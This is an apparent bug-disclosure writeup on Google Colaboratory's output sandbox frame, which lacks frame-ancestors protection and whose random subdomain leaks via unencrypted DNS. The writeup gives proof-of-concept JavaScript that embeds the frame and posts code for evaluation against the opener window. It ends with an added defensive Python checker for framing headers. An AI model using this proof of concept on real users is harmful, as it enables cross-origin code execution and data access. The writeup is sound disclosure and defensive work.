Writeups

Google Colaboratory puts some output, such as visualizations, into a sandboxed frame; however, that frame has no embedding protection such as a CSP frame-ancestors directive, so its origin is exposed to attackers with local network access.

let w = open('about:blank');

Then, on the about:blank window:

opener.location = 'https://colab.research.google.com/';

Leak the sandbox ID from the unencrypted DNS lookup, then do:

let IDfromDNS = 'blah';
let f = document.createElement('iframe');
f.hidden = true;
f.src =
  'https://' + IDfromDNS + '-0-colab.googleusercontent.com/outputframe.html';
document.body.appendChild(f);
setTimeout((_) => {
  f.contentWindow.postMessage(
    {sandboxed_iframe_evaluation: 'console.log(parent.opener[0].google)'},
    '*'
  );
}, 100);

This is run against the “Welcome to Colaboratory” project, with the sandbox embedded on the attacker's website.

Sandboxes sometimes rely on a randomly generated subdomain for isolation; unfortunately, because DNS lookups are unencrypted, this is not safe. See https://www.cloudflare.com/learning/dns/dns-over-tls/
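As an added example, not part of the original writeup, the following Python check evaluates a response's headers and reports whether an arbitrary origin may frame it, which is the missing protection described above; the origins it is fed are constructed placeholders.

```python
from urllib.parse import urlsplit


def parse_csp(header):
    """Parse a CSP value into {directive: [sources]}; first occurrence wins."""
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def _source_matches(source, embedder, resource):
    """Does one frame-ancestors source expression admit the embedder origin?"""
    src = source.strip("'").lower()  # keywords arrive quoted: 'none', 'self'
    e, r = urlsplit(embedder), urlsplit(resource)
    if src == "none":
        return False
    if src == "self":
        return (e.scheme, e.hostname, e.port) == (r.scheme, r.hostname, r.port)
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:  # scheme-source such as https:
        return e.scheme == src[:-1]
    parsed = urlsplit(src if "//" in src else "//" + src)  # host-source
    if parsed.scheme and parsed.scheme != e.scheme:
        return False
    host = parsed.hostname or ""
    if host.startswith("*."):
        return e.hostname.endswith(host[1:])
    return e.hostname == host


def frameable_by(headers, resource_origin, embedder_origin):
    """True when a page at embedder_origin may frame resource_origin, judged
    from the resource's response headers. frame-ancestors takes precedence
    over X-Frame-Options, as in browsers; with neither, anyone can embed."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(lower.get("content-security-policy", ""))
    if "frame-ancestors" in csp:  # an empty source list means 'none'
        return any(_source_matches(s, embedder_origin, resource_origin)
                   for s in csp["frame-ancestors"])
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return urlsplit(embedder_origin)[:2] == urlsplit(resource_origin)[:2]
    return True  # no embedding protection at all (obsolete ALLOW-FROM ignored)
```

The output frame in the writeup corresponds to the last branch: no frame-ancestors and no X-Frame-Options, so a random subdomain is the only thing standing between it and an arbitrary embedder.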